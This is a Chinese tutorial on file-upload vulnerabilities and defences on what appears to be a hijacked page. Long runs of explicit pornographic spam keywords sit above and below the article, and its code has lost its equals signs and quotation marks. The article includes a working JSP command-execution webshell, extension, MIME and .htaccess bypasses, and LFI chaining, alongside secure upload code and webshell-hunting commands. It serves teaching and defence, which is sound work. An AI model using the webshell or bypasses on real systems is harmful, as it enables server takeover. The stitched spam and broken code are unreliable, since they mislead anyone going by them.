日韩精品一区二区三区在线视频放-无码中文字幕V?一区二区-成年片免费观看视频-国内少妇人妻丰满av-国产精品中文字幕免费观看-亚洲成人久久一区二区三区-国内少妇偷人精品视频无缓冲-一区二区国产精品日本一区二区三区在线网

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn)

Web文件上傳安全:從漏洞原理到防御實(shí)戰(zhàn) 在實(shí)際 Web 開發(fā)與安全測試中文件上傳功能是業(yè)務(wù)剛需也是安全重災(zāi)區(qū)。一個看似簡單的上傳接口背后涉及前端校驗(yàn)、后端處理、文件存儲、權(quán)限控制、安全過濾等多個環(huán)節(jié)任何一個環(huán)節(jié)的疏忽都可能導(dǎo)致嚴(yán)重的安全漏洞例如惡意文件上傳、服務(wù)器被控制、數(shù)據(jù)泄露等。對于開發(fā)者而言理解如何安全地實(shí)現(xiàn)文件上傳對于安全研究者或滲透測試人員而言理解如何發(fā)現(xiàn)并利用文件上傳漏洞是兩項(xiàng)同等重要的核心技能。本文將以一個實(shí)戰(zhàn)視角深入探討 Web 文件上傳的完整流程、常見安全漏洞的成因、攻擊手法以及對應(yīng)的防御策略。我們將從開發(fā)一個基礎(chǔ)的文件上傳功能開始逐步引入安全風(fēng)險并演示攻擊者如何繞過層層防御最終目標(biāo)是構(gòu)建一個既滿足業(yè)務(wù)需求又具備足夠安全性的文件上傳模塊。無論你是正在開發(fā)相關(guān)功能的 Java 或 PHP 開發(fā)者還是正在學(xué)習(xí) CTFCapture The Flag中 Web 題目或進(jìn)行滲透測試的安全愛好者這篇文章都將提供從原理到實(shí)踐的具體指導(dǎo)。1. 理解文件上傳的核心流程與安全邊界文件上傳不僅僅是用戶選擇文件并點(diǎn)擊“提交”按鈕那么簡單。一個完整的、考慮安全性的文件上傳流程通常涉及客戶端瀏覽器、服務(wù)器端應(yīng)用程序、服務(wù)器運(yùn)行環(huán)境如 Tomcat、Nginx以及最終的文件存儲系統(tǒng)本地磁盤、對象存儲等多個層面。1.1 標(biāo)準(zhǔn)文件上傳流程分解當(dāng)用戶通過網(wǎng)頁表單上傳文件時數(shù)據(jù)會以multipart/form-data的格式編碼并通過 HTTP POST 請求發(fā)送到服務(wù)器。服務(wù)器端應(yīng)用程序如 Spring MVC、Servlet、PHP接收到請求后需要解析這些復(fù)雜的數(shù)據(jù)提取出文件內(nèi)容和其他表單字段。一個簡化的安全上傳流程應(yīng)包含以下步驟前端校驗(yàn)通過 JavaScript 檢查文件大小、類型后綴名提供即時反饋提升用戶體驗(yàn)。注意前端校驗(yàn)極易被繞過絕不能作為安全依賴。HTTP 請求接收Web 容器如 Tomcat或框架如 Spring解析multipart/form-data請求。后端校驗(yàn)核心安全環(huán)節(jié)文件類型校驗(yàn)檢查文件的真實(shí)類型而非僅依賴后綴名。常用方法包括檢查文件內(nèi)容魔數(shù)Magic Number、MIME 類型。文件大小限制在代碼和服務(wù)器配置如 Nginx、Tomcat層面限制上傳文件大小防止拒絕服務(wù)攻擊DoS。文件名處理對上傳的文件名進(jìn)行重命名如使用 UUID防止路徑遍歷和覆蓋關(guān)鍵文件。內(nèi)容安全檢查對圖片文件進(jìn)行二次渲染對文本文件進(jìn)行惡意代碼掃描。安全存儲目錄權(quán)限上傳目錄應(yīng)設(shè)置為不可執(zhí)行腳本。例如在 Linux 下目錄權(quán)限應(yīng)為755文件權(quán)限應(yīng)為644。目錄隔離文件不應(yīng)存儲在 Web 根目錄下應(yīng)通過程序映射訪問。例如文件實(shí)際存儲在/var/uploads/通過/file/{id}這樣的控制器接口讀取并返回。使用對象存儲將文件上傳至阿里云 OSS、騰訊云 COS 等對象存儲服務(wù)徹底分離 Web 服務(wù)器和文件存儲。訪問控制對下載或訪問上傳文件的接口進(jìn)行權(quán)限校驗(yàn)防止未授權(quán)訪問。1.2 文件上傳漏洞的本質(zhì)文件上傳漏洞產(chǎn)生的根本原因在于服務(wù)器對用戶上傳的文件數(shù)據(jù)未進(jìn)行充分、有效的驗(yàn)證導(dǎo)致攻擊者能夠上傳被服務(wù)器解釋執(zhí)行的可執(zhí)行文件如.jsp,.php,.asp或特定配置下的.jpg。攻擊成功的關(guān)鍵在于上傳的文件必須能夠被 Web 服務(wù)器以某種方式“執(zhí)行”。例如上傳一個.jsp文件到 Tomcat 的 Web 應(yīng)用目錄該文件就會被 Tomcat 的 JSP 引擎編譯執(zhí)行。上傳一個.php文件到 Apache PHP 環(huán)境的網(wǎng)站根目錄該文件就會被 PHP 解析器執(zhí)行。在某些錯誤配置下上傳一個包含 PHP 代碼的.jpg文件如果服務(wù)器配置了AddType application/x-httpd-php .jpg該圖片文件也會被當(dāng)作 PHP 執(zhí)行。2. 環(huán)境準(zhǔn)備與靶場搭建為了清晰地演示漏洞和防御我們需要一個實(shí)驗(yàn)環(huán)境。你可以選擇以下任意一種方式2.1 使用 Docker 快速搭建漏洞靶場對于安全學(xué)習(xí)使用現(xiàn)成的漏洞靶場是最快的方式。這里推薦upload-labs一個專注于文件上傳漏洞的練習(xí)平臺。# 1. 確保已安裝 Docker docker --version # 2. 拉取 upload-labs 鏡像 docker pull c0ny1/upload-labs # 3. 運(yùn)行容器將容器內(nèi)80端口映射到宿主機(jī)的8080端口 docker run -d -p 8080:80 --name upload-labs c0ny1/upload-labs # 4. 訪問 http://localhost:8080 即可開始挑戰(zhàn)2.2 手動創(chuàng)建簡易漏洞演示項(xiàng)目Java Web如果你想從開發(fā)者視角理解漏洞產(chǎn)生可以創(chuàng)建一個簡單的 Spring Boot 項(xiàng)目。項(xiàng)目初始化使用 Spring Initializr 或 IDE 創(chuàng)建一個 Spring Boot 項(xiàng)目依賴選擇Spring Web和Thymeleaf用于簡單前端。創(chuàng)建上傳頁面(src/main/resources/templates/upload.html)!DOCTYPE html html xmlns:thhttp://www.thymeleaf.org head meta charsetUTF-8 title不安全的上傳演示/title /head body h2文件上傳不安全版本/h2 form action/upload methodpost enctypemultipart/form-data input typefile namefile / br/br/ input typesubmit value上傳 / /form p th:text${message}/p /body /html創(chuàng)建漏洞控制器(src/main/java/com/example/demo/controller/UnsafeUploadController.java)import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.multipart.MultipartFile; import org.springframework.web.servlet.ModelAndView; import java.io.File; import java.io.IOException; Controller public class UnsafeUploadController { // 定義一個不安全的存儲路徑在Web可訪問目錄下 private final String UPLOAD_DIR src/main/resources/static/uploads/; GetMapping(/) public String index() { return upload; } PostMapping(/upload) public ModelAndView handleFileUpload(RequestParam(file) MultipartFile file) { ModelAndView mav new ModelAndView(upload); if (file.isEmpty()) { mav.addObject(message, 請選擇一個文件上傳。); return mav; } try { // 漏洞點(diǎn)1直接使用原始文件名存在路徑遍歷風(fēng)險 String fileName file.getOriginalFilename(); // 漏洞點(diǎn)2文件存儲在Web靜態(tài)資源目錄下可直接通過URL訪問 File dest new File(UPLOAD_DIR fileName); // 創(chuàng)建目錄如果不存在 dest.getParentFile().mkdirs(); file.transferTo(dest); mav.addObject(message, 文件上傳成功: dest.getAbsolutePath()); } catch (IOException e) { e.printStackTrace(); mav.addObject(message, 文件上傳失敗: e.getMessage()); } return mav; } }配置(src/main/resources/application.properties)# 設(shè)置單個文件最大大小僅為示例實(shí)際需要更多配置 spring.servlet.multipart.max-file-size10MB spring.servlet.multipart.max-request-size10MB運(yùn)行這個 Spring Boot 應(yīng)用你就擁有了一個具備典型漏洞的上傳點(diǎn)。3. 常見文件上傳漏洞攻擊手法與演示我們將基于上面創(chuàng)建的簡易漏洞項(xiàng)目演示幾種常見的攻擊手法。3.1 攻擊手法一直接上傳 Webshell這是最基礎(chǔ)的情況服務(wù)器未做任何過濾。準(zhǔn)備 Webshell創(chuàng)建一個簡單的 JSP Webshell 文件shell.jsp。% page importjava.util.*,java.io.*% % // 非常簡單的命令執(zhí)行Webshell if(request.getParameter(cmd) ! null) { Process p Runtime.getRuntime().exec(request.getParameter(cmd)); OutputStream os p.getOutputStream(); InputStream in p.getInputStream(); DataInputStream dis new DataInputStream(in); String disr dis.readLine(); while ( disr ! null ) { out.println(disr); disr dis.readLine(); } } %發(fā)起攻擊訪問http://localhost:8080/選擇shell.jsp文件并上傳。訪問 Webshell如果上傳成功文件將位于http://localhost:8080/uploads/shell.jsp。訪問該 URL并附加參數(shù)?cmdwhoami即可在頁面上看到服務(wù)器執(zhí)行whoami命令的結(jié)果。漏洞原因后端代碼未對文件后綴名、內(nèi)容做任何檢查且文件存儲在 Web 可訪問目錄。3.2 攻擊手法二繞過前端校驗(yàn)很多網(wǎng)站僅在前端通過 JavaScript 檢查文件后綴名。前端校驗(yàn)示例在upload.html的form標(biāo)簽前添加 JS 代碼。script function checkFile() { var file document.querySelector(input[typefile]).files[0]; var fileName file.name; var ext fileName.substring(fileName.lastIndexOf(.) 1).toLowerCase(); if (ext ! jpg ext ! png ext ! gif) { alert(只允許上傳圖片文件 (jpg, png, gif)); return false; } return true; } /script form ... onsubmitreturn checkFile() ...繞過方法方法A禁用JS在瀏覽器設(shè)置中禁用 JavaScript即可直接上傳任意文件。方法B代理攔截修改使用 Burp Suite 或 Fiddler 等抓包工具。先正常選擇一個test.jpg文件上傳用抓包工具截獲 POST 請求。在抓包工具中將請求體中的文件名test.jpg修改為shell.jsp同時確保文件內(nèi)容Content-Disposition部分和后續(xù)的二進(jìn)制內(nèi)容是正確的 Webshell 代碼。將修改后的請求發(fā)送給服務(wù)器。結(jié)果服務(wù)器接收到的是shell.jsp的文件名和內(nèi)容前端校驗(yàn)被完全繞過。漏洞原因信任了完全由客戶端控制的數(shù)據(jù)。3.3 攻擊手法三繞過黑名單校驗(yàn)特殊解析漏洞假設(shè)后端采用了黑名單機(jī)制禁止了.jsp,.php,.asp等后綴。// 在Controller中添加黑名單檢查 String[] blackList {.jsp, .php, .asp, .aspx, .jspx}; String fileName file.getOriginalFilename().toLowerCase(); for (String badExt : blackList) { if (fileName.endsWith(badExt)) { mav.addObject(message, 禁止上傳此類文件); return mav; } }攻擊者可以嘗試以下繞過方式大小寫繞過.Jsp,.PhP如果后端校驗(yàn)時未統(tǒng)一轉(zhuǎn)為小寫。雙寫后綴繞過shell.jsp.jsp如果后端只簡單地刪除一次.jsp字符串。空格/點(diǎn)號繞過shell.jsp.或shell.jsp末尾空格在某些系統(tǒng)處理文件名時會被忽略。利用解析特性Apache如果配置不當(dāng)shell.php.jpg可能被解析為.php文件。IIS 6.0shell.asp;.jpg或shell.asp:.jpg目錄名曾是有名的解析漏洞。Nginx錯誤配置fastcgi導(dǎo)致shell.jpg/.php被解析為 PHP 文件。.htaccess攻擊針對 Apache如果服務(wù)器允許上傳.htaccess文件攻擊者可以上傳一個自定義的.htaccess內(nèi)容為AddType application/x-httpd-php .jpg這將使該目錄下所有.jpg文件都被當(dāng)作 PHP 執(zhí)行。然后再上傳一個包含 PHP 代碼的shell.jpg即可。3.4 攻擊手法四繞過內(nèi)容類型MIME校驗(yàn)有些后端會檢查 HTTP 請求頭中的Content-Type。// 檢查Content-Type if (!file.getContentType().equals(image/jpeg) !file.getContentType().equals(image/png)) { mav.addObject(message, 文件類型不正確); return mav; }繞過方法和繞過前端校驗(yàn)一樣使用抓包工具如 Burp Suite直接修改請求頭中的Content-Type將其改為image/jpeg而請求體中的文件內(nèi)容仍然是 Webshell。漏洞原因Content-Type同樣來自客戶端請求頭完全可控不可信。3.5 攻擊手法五利用文件包含漏洞配合上傳這是一種組合攻擊。假設(shè)網(wǎng)站存在文件包含漏洞如 PHP 的include($_GET[‘file’])且上傳功能對圖片內(nèi)容做了嚴(yán)格檢查如二次渲染導(dǎo)致無法直接上傳可執(zhí)行腳本。攻擊步驟上傳一個內(nèi)容為?php phpinfo();?的純文本文件命名為info.txt。由于內(nèi)容是文本可能通過檢查。利用文件包含漏洞訪問http://victim.com/include.php?file./uploads/info.txt。服務(wù)器執(zhí)行了include將info.txt的內(nèi)容作為 PHP 代碼解析從而執(zhí)行了phpinfo()。漏洞原因上傳點(diǎn)與文件包含漏洞點(diǎn)形成“組合拳”本地文件包含LFI可以包含用戶上傳的文件。4. 構(gòu)建安全的文件上傳功能了解了攻擊方式我們就可以有針對性地構(gòu)建防御。安全是一個過程需要多層防護(hù)。4.1 防御策略總覽防御層具體措施目的前端JS 校驗(yàn)文件大小、類型改善用戶體驗(yàn)非安全措施網(wǎng)絡(luò)層WAFWeb應(yīng)用防火墻攔截已知攻擊payload應(yīng)用層核心1. 白名單文件后綴2. 校驗(yàn)文件類型魔數(shù)3. 重命名文件UUID4. 限制文件大小5. 圖片二次渲染/壓縮6. 病毒/惡意代碼掃描實(shí)現(xiàn)業(yè)務(wù)邏輯層面的安全校驗(yàn)服務(wù)器配置1. 上傳目錄無執(zhí)行權(quán)限2. 資源文件通過程序讀取3. 定期清理未關(guān)聯(lián)文件防止上傳的文件被直接執(zhí)行架構(gòu)層使用對象存儲OSS/COS實(shí)現(xiàn)業(yè)務(wù)服務(wù)器與文件存儲分離4.2 安全上傳代碼實(shí)現(xiàn)Java Spring Boot 示例下面是一個相對安全的文件上傳控制器實(shí)現(xiàn)import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; import org.springframework.web.multipart.MultipartFile; import org.apache.commons.io.FilenameUtils; import org.apache.tika.Tika; import javax.imageio.ImageIO; import java.awt.image.BufferedImage; import java.io.*; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.Arrays; import java.util.List; import java.util.UUID; Controller public class SafeUploadController { // 從配置文件中讀取確保不在Web目錄下 Value(${app.upload.dir:/var/uploads/}) private String uploadBaseDir; // 允許上傳的文件類型白名單后綴名 private static final ListString ALLOWED_EXTENSIONS Arrays.asList(jpg, jpeg, png, gif); // 允許的MIME類型白名單 private static final ListString ALLOWED_MIME_TYPES Arrays.asList(image/jpeg, image/png, image/gif); // 最大文件大小 5MB private static final long MAX_FILE_SIZE 5 * 1024 * 1024; PostMapping(/safe-upload) ResponseBody public String handleSafeFileUpload(RequestParam(file) MultipartFile file) { // 1. 檢查文件是否為空 if (file.isEmpty()) { return 文件為空。; } // 2. 檢查文件大小 if (file.getSize() MAX_FILE_SIZE) { return 文件大小超過限制5MB。; } // 3. 校驗(yàn)文件后綴名白名單 String originalFileName file.getOriginalFilename(); String fileExtension FilenameUtils.getExtension(originalFileName).toLowerCase(); if (!ALLOWED_EXTENSIONS.contains(fileExtension)) { return 不支持的文件類型。; } // 4. 校驗(yàn)文件真實(shí)類型使用Apache Tika檢測魔數(shù) try { Tika tika new Tika(); String detectedType tika.detect(file.getBytes()); if (!ALLOWED_MIME_TYPES.contains(detectedType)) { return 文件真實(shí)類型與后綴名不符或不被允許。; } } catch (IOException e) { return 文件類型檢測失敗。; } // 5. 如果是圖片可以進(jìn)行二次渲染徹底清除元數(shù)據(jù)和非圖像數(shù)據(jù) if (fileExtension.matches(jpg|jpeg|png|gif)) { try { BufferedImage image ImageIO.read(file.getInputStream()); if (image null) { return 上傳的文件不是有效的圖片。; } // 這里可以添加圖片壓縮、縮放等處理 // ImageIO.write(image, png, ...); } catch (IOException e) { return 圖片處理失敗文件可能已損壞。; } } // 6. 生成安全的存儲文件名和路徑 String safeFileName UUID.randomUUID().toString() . fileExtension; // 使用UUID重命名 Path uploadPath Paths.get(uploadBaseDir).toAbsolutePath().normalize(); Path filePath uploadPath.resolve(safeFileName); // 確保上傳目錄存在且安全 try { Files.createDirectories(uploadPath); // 重要檢查目錄是否在預(yù)期范圍內(nèi)防止路徑遍歷 if (!filePath.normalize().startsWith(uploadPath.normalize())) { return 無效的文件路徑。; } } catch (IOException e) { return 無法創(chuàng)建上傳目錄。; } // 7. 保存文件 try (InputStream inputStream file.getInputStream()) { Files.copy(inputStream, filePath); } catch (IOException e) { return 文件保存失敗。; } // 8. 返回文件訪問ID非真實(shí)路徑通過另一個安全接口訪問 String fileId safeFileName; // 實(shí)際可能用數(shù)據(jù)庫關(guān)聯(lián)ID return 文件上傳成功。訪問ID: fileId; } // 安全訪問文件的接口 GetMapping(/file/{fileId}) public void getFile(PathVariable String fileId, HttpServletResponse response) { // 1. 根據(jù)fileId從數(shù)據(jù)庫或緩存中查詢真實(shí)文件名和路徑此處簡化 // 2. 進(jìn)行權(quán)限校驗(yàn)如用戶是否登錄、是否有權(quán)訪問此文件 // 3. 從安全的存儲目錄讀取文件流 Path filePath Paths.get(uploadBaseDir, fileId).normalize(); File file filePath.toFile(); if (!file.exists()) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } // 4. 設(shè)置正確的Content-Type并輸出流 response.setContentType(Files.probeContentType(filePath)); try (OutputStream os response.getOutputStream(); FileInputStream fis new FileInputStream(file)) { byte[] buffer new byte[1024]; int bytesRead; while ((bytesRead fis.read(buffer)) ! -1) { os.write(buffer, 0, bytesRead); } os.flush(); } catch (IOException e) { response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR); } } }關(guān)鍵防御點(diǎn)解釋白名單校驗(yàn)只允許明確需要的文件類型。文件類型檢測使用 Apache Tika 等庫通過文件內(nèi)容的魔數(shù)判斷真實(shí)類型不信任后綴名和Content-Type。圖片二次渲染使用ImageIO.read和write處理圖片可以剝離可能隱藏在元數(shù)據(jù)如 EXIF或文件冗余數(shù)據(jù)區(qū)中的惡意代碼。文件重命名使用 UUID 等隨機(jī)字符串避免文件名沖突和路徑遍歷攻擊。路徑安全使用Paths.get().normalize()和startsWith()檢查防止../../../etc/passwd這類路徑遍歷。存儲隔離文件存儲在 Web 根目錄之外如/var/uploads/不能通過http://domain/uploads/xxx直接訪問必須通過后端控制器/file/{id}進(jìn)行鑒權(quán)后訪問。4.3 服務(wù)器與中間件安全配置代碼層面的安全需要配合服務(wù)器配置才能生效。Nginx 配置示例防止上傳目錄執(zhí)行腳本location ^~ /uploads/ { # 如果文件必須放在Web目錄下則禁止執(zhí)行任何腳本 location ~* \.(jsp|php|asp|aspx|pl|py)$ { deny all; return 403; } # 或者對于上傳目錄直接返回403 # deny all; # return 403; }Apache 配置示例在.htaccess或httpd.conf中Directory /var/www/html/uploads # 禁止執(zhí)行任何腳本 php_flag engine off RemoveHandler .php .php3 .php4 .php5 .php7 .phtml RemoveType .php .php3 .php4 .php5 .php7 .phtml # 只允許訪問圖片等靜態(tài)文件 FilesMatch \.(jpg|jpeg|png|gif|ico|txt|pdf)$ Order Allow,Deny Allow from all /FilesMatch FilesMatch \.(php|pl|py|jsp|asp|sh|cgi)$ Order Deny,Allow Deny from all /FilesMatch /DirectoryLinux 目錄權(quán)限# 上傳目錄應(yīng)屬于運(yùn)行Web服務(wù)的用戶如www-data, tomcat chown -R www-data:www-data /var/uploads/ # 目錄權(quán)限755文件權(quán)限644確保目錄不可寫除非需要上傳 chmod 755 /var/uploads/ # 如果程序需要寫文件可以設(shè)置目錄為775但務(wù)必確保沒有執(zhí)行權(quán)限問題5. 文件上傳漏洞的排查與應(yīng)急響應(yīng)即使采取了措施也可能存在未知的繞過方式。需要建立監(jiān)控和響應(yīng)機(jī)制。5.1 如何發(fā)現(xiàn)文件上傳漏洞作為開發(fā)者/防御方代碼審計檢查文件上傳相關(guān)代碼是否僅依賴黑名單、是否未校驗(yàn)內(nèi)容、是否存儲路徑可訪問。日志分析監(jiān)控上傳接口的訪問日志尋找異常請求如頻繁上傳、異常后綴、過大文件。文件系統(tǒng)監(jiān)控使用inotify等工具監(jiān)控上傳目錄警惕非圖片文件尤其是.jsp,.php,.htaccess的出現(xiàn)。安全掃描使用 AWVS、Nessus 或開源工具定期對上傳功能進(jìn)行掃描。作為攻擊方/滲透測試方模糊測試使用 Burp Suite Intruder 或自定義腳本批量嘗試各種繞過技巧大小寫、雙寫、特殊字符、不同 Content-Type。解析漏洞測試針對特定服務(wù)器IIS, Nginx, Apache測試歷史解析漏洞的變種。組合漏洞測試檢查是否存在文件包含、任意文件讀取等漏洞可與上傳點(diǎn)結(jié)合利用。5.2 常見問題排查清單當(dāng)懷疑存在文件上傳漏洞或已遭攻擊時按此清單排查排查項(xiàng)操作命令/檢查點(diǎn)說明1. 檢查近期上傳文件find /var/www/html/uploads -type f -mtime -1(查找1天內(nèi)修改的文件)快速定位可疑新增文件。2. 查找Webshell特征grep -r Runtime.getRuntime|eval(|system(|passthru|shell_exec /var/www/html/在Web目錄中搜索常見危險函數(shù)。3. 檢查服務(wù)器進(jìn)程ps auxgrep java|php|tomcat或netstat -tulnp4. 分析Web訪問日志tail -f /var/log/nginx/access.log | grep \POST.*upload\或搜索.jsp,.php的訪問記錄。定位攻擊來源和攻擊時間。5. 檢查定時任務(wù)crontab -l(當(dāng)前用戶) 和ls /etc/cron.*Webshell 常會添加后門定時任務(wù)。6. 檢查系統(tǒng)用戶cat /etc/passwd查看是否有新增的未知用戶。7. 驗(yàn)證修復(fù)是否生效重新嘗試之前成功的攻擊 payload確認(rèn)是否被攔截。確保修復(fù)措施已生效。5.3 應(yīng)急響應(yīng)步驟隔離立即禁用文件上傳功能或整個應(yīng)用。定位根據(jù)上述排查清單找到被上傳的惡意文件。清除刪除所有發(fā)現(xiàn)的 Webshell 和異常文件。注意檢查文件創(chuàng)建時間、隱藏文件以.開頭、以及可能被插入惡意代碼的正常文件。溯源分析日志確定攻擊入口、攻擊者 IP、攻擊時間線。修復(fù)根據(jù)漏洞原因?qū)嵤┍菊碌?節(jié)的安全措施。加固修復(fù)服務(wù)器配置審查所有上傳點(diǎn)代碼考慮引入 WAF 規(guī)則。監(jiān)控加強(qiáng)日志審計和文件監(jiān)控設(shè)置告警。6. 進(jìn)階話題與最佳實(shí)踐6.1 使用對象存儲服務(wù)將文件上傳至云端對象存儲如阿里云 OSS、騰訊云 COS、MinIO是當(dāng)前的最佳實(shí)踐。它帶來了多重好處安全分離業(yè)務(wù)服務(wù)器與文件存儲分離即使文件被上傳惡意腳本也無法在業(yè)務(wù)服務(wù)器上執(zhí)行。彈性擴(kuò)展存儲容量和帶寬易于擴(kuò)展。高可用與持久性對象存儲通常提供多副本冗余。便捷處理很多服務(wù)提供圖片處理、視頻截幀等能力。集成時通常由業(yè)務(wù)服務(wù)器向?qū)ο蟠鎯Ψ?wù)商申請一個臨時的上傳憑證STS Token前端直接使用該憑證將文件上傳至對象存儲上傳成功后對象存儲回調(diào)業(yè)務(wù)服務(wù)器或前端通知業(yè)務(wù)服務(wù)器文件信息如 URL。業(yè)務(wù)服務(wù)器只保存文件的元信息如存儲路徑、大小、類型不直接處理文件流。6.2 文件內(nèi)容深度檢查對于高風(fēng)險場景需要更深入的內(nèi)容檢查反病毒掃描集成 ClamAV 等開源殺毒引擎對上傳文件進(jìn)行掃描。靜態(tài)代碼分析對于允許上傳的文本文件如 PDF, DOC可以檢查是否包含惡意宏或腳本。沙箱動態(tài)檢測對于無法確認(rèn)的文件可以將其在隔離的沙箱環(huán)境中運(yùn)行觀察其行為。6.3 針對 CTF 與滲透測試的特別技巧在 CTF 或授權(quán)滲透測試中目標(biāo)往往是刻意存在漏洞的。除了上述常見方法還需注意信息收集查看網(wǎng)頁源碼、JS 文件尋找隱藏的上傳點(diǎn)或提示。檢查 HTTP 響應(yīng)頭有時錯誤信息或特殊的響應(yīng)頭會提示服務(wù)器類型、組件版本。嘗試各種解析漏洞研究目標(biāo)服務(wù)器Apache/Nginx/IIS/Tomcat特定版本的已知解析漏洞。利用條件競爭如果服務(wù)器先保存文件再檢查內(nèi)容可能存在時間差可以嘗試在文件被刪除前訪問并執(zhí)行它。結(jié)合其他漏洞如目錄遍歷、文件包含、XXEXML外部實(shí)體注入等與文件上傳結(jié)合形成攻擊鏈。文件上傳功能是 Web 安全的試金石。一個健壯的上傳模塊需要開發(fā)者具備防御性編程思維不信任任何來自客戶端的數(shù)據(jù)并在前端、后端、服務(wù)器配置、網(wǎng)絡(luò)架構(gòu)多個層面實(shí)施縱深防御。對于安全人員而言理解攻擊者的繞過手法是進(jìn)行有效代碼審計和滲透測試的基礎(chǔ)。在實(shí)踐中沒有一勞永逸的銀彈持續(xù)關(guān)注新的攻擊手法定期審查和更新安全策略才是保障系統(tǒng)安全的關(guān)鍵。建議將本文中的安全代碼示例作為起點(diǎn)結(jié)合項(xiàng)目的具體業(yè)務(wù)邏輯和架構(gòu)構(gòu)建適合自身的安全上傳方案。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
欧美激情 亚洲色图| 色噜噜国产精品视频一区二区| 伊人久大| 强被迫伦姧在线观看无码网站| 成人欧美一区二区三区黑人一| 国产十八禁视频| 91精品人妻一区二区三区蜜桃臀| 日本伦乱九九九综合| 欧美最婬乱婬爆婬性视频| 黑丝自慰喷水网站| 亚洲熟妇A V黑人| 情色五月天久久久| 五月天色五月| 闷骚老熟女15P| 久久透逼视频| 国产精品成人午夜福利| 91爱做| 亚洲砖码砖专无区2023| 熟妇的味道HD中文字幕| 放黄片放3级黄片没穿衣服| 亚洲淫色网中文| 中国探花熟女| 国产人伦a片信息免费片| 欧美日韩亚洲天堂| 麻豆色99999| 老司机午夜福利视频一区二区| 国产丝袜美女诱惑| 欧美久久草熟女| 国产树林里野战在线看| 色色五月婷| 久久久麻豆精品| 怡红院亚洲怡春院av| 96免费视频在线| 激情五月天婷婷| 成人国产精品三级A片| 影音先锋视频在线| 亚洲天天做日日做天天谢日日| 久久久久女教师免费一区| 69久久久久久久久久久久久| 99国内熟女露脸视频| 性欧美另类高清| 色人久久| 亚洲激情久久| 一本大道综合伊人精品热热| 天天综合网91入口| 粉嫩AV一区夜夜嗨| www.acm成人黄色毛片| 欧美大战久久久伊人| 东京成人一区| 精品一区二区三区四区外站 | 青青青青操国内视频在线| 亚洲国产青青| www.男人的天堂| 人妻熟女一区二区在线视频| 天天综合网在线观看| 少妇高潮九九九九九九九| 伊人久久亚洲色欲综合网站| 免费视频观看60秒| 欧美黑人极品高潮喷吹熟女黑人性暴力日韩在线欧美极品一区 | 久操精品网| 91精品久久久久久77777| 国模吧 一区二区三区| 日本操BAV| 色噜噜精品一区二区三| 密桃99999| 中文字幕一区二区三区人妻少妇在线| 日韩精品操少妇| 天美欧美国产| 国产97在线播放| 色777999综合| 久久超碰日韩精品| 欧洲欧美视频一区二区| 亚洲国产麻豆一区二区三区| 成人国产精品三级A片| 亚洲第一页色| 男人的天堂在线2| 超碰国产情侣自拍网| 久久久穴999| 国产精品一级二级在线| 久久久精品网站| 欧美精品一区二区少妇免费A片| 操高情无码| 激情综合网激情五月天| 日本不卡二三区| 人妻无码一区二区三区久久99| 亚洲精品乱码久久久久久蜜桃麻豆| 国产精品熟女一区二区三区| 另类亚洲图色| 97少妇人妻中文字幕久久 | 欧美成人四级在线播放| 亚洲午夜av| 欧洲熟妇xxXx欧美老妇裸体 | 精品九九淫乱男| 自拍第一页| 99久久久无码国产精品性啊聊| 91av一区二区在线观看| 五月天久久久| 九九九九九九九九九九九九九九九女| 亚洲精品欧洲色| 不卡av在线中文字幕| 日本岛国黄色网址| 久久久久密臀一区二区| 熟女探花啪啪| 五月激情小说| 91日韩网站| 十八禁av无码免费网站APP| 人妻-91porn| 人人操天天爽| 亚洲加勒比久久日本道| 综合婷婷| 中文字幕人妻丝袜乱一区三区| 精品久久久久久中文字幕三区| 任你爽视频| 91超碰在线播放| PMv在线观看| 中文字幕成人| 97伊人超碰| 亚洲āv网址在线观看| 欧美九9 9 9| 91国精产品| 香蕉黄色一级视频| 99热免费| 日韩一级二级三级免费看完整版| 久久这里只有精品9| 欧美性爱日韩性爱| 啊啊啊97视频| 国产丝袜欧美在线视频| 天天干,天天日| 亚洲日产专区婷婷| 97在线精品观看视频| 欧美九九99久久精品| 清纯唯美综合| 婷婷久久五月天| 97色欧洲| 少妇二级| 日本中文字幕不卡视频| 91美女国产在线| 99这里只有精品国产| 炮色五月| 欧美爱三级日韩久久| 亚洲色图加勒比| 97色碰| 日本 欧美 亚中文字幕| 内射小黄片| 九九热五区| 精品无码不卡视频| 欧美亚洲清纯| 色老汉色| 综合操逼| 午夜精品久久99蜜桃的功能章节| 国产欧美日韩女同性恋ww喷水精品 | 超碰97人妻免费在线| 男女猛烈无遮掩视频免费软件| 欧美最婬乱婬爆婬性视频| 日韩在线国产字幕| 亚洲精品国产AV天美传媒| 超碰精品国产无码| 亚洲素人综合| 中文伊人大香蕉视频| 免费视频在线一区二区不卡| 超碰97亚洲区| 97精彩视频网站| 乱抡国产91| 亚洲日产专区婷婷| 99熟女| 国产女人视频三四五区| 欧美色综合图片| 性色av婷婷久久一区二区点复制| 国产精品自拍视频| 十八禁电影伊人网| 91偷拍欧美亚洲| 日韩av一级黄片| 亚洲狠| 午夜性| 女同性恋久久| 翔田千里A片一区二区| 日本天天干天天搞一区| A久久| 在线岛| 91欧美www| 操逼999| 色综合久| 天天干人人干天天日97| 超碰97丝袜| 操B久久| www.狠狠操| 最新无码国产| 久热这里| 亚洲精品蜜桃久久久久久久| 天天爽爽爽爽| 91粉嫩萝控精品福利网站_精品影音先锋国 | 日韩黄片视频试看| 天天日夜干| 91美女視頻| 女人妻一区| 国内毛片免费h片在线| 日本韩国国产精品一区| 成人性交午夜免费片| 色网在线| 黑人与人妻| 欧美嗯啊……在线观看视频免费| 国内自拍 日韩激情 99| 中文一区在线视频| 人妻少妇精品视频一区二区三区| 久久成人网站| 欧美日日人人天天| 中文字幕、久久精品国产2020、久久综合久久自在自线精品自、亚洲 | 日本乱人伦片中文三区| 国内精品久久人妻性色av| 草草草草视频| 久久久久久九九九| 亚洲欧洲自拍| 精品午夜福利| 国产精品乱码久久久| 欧美另类自拍 | 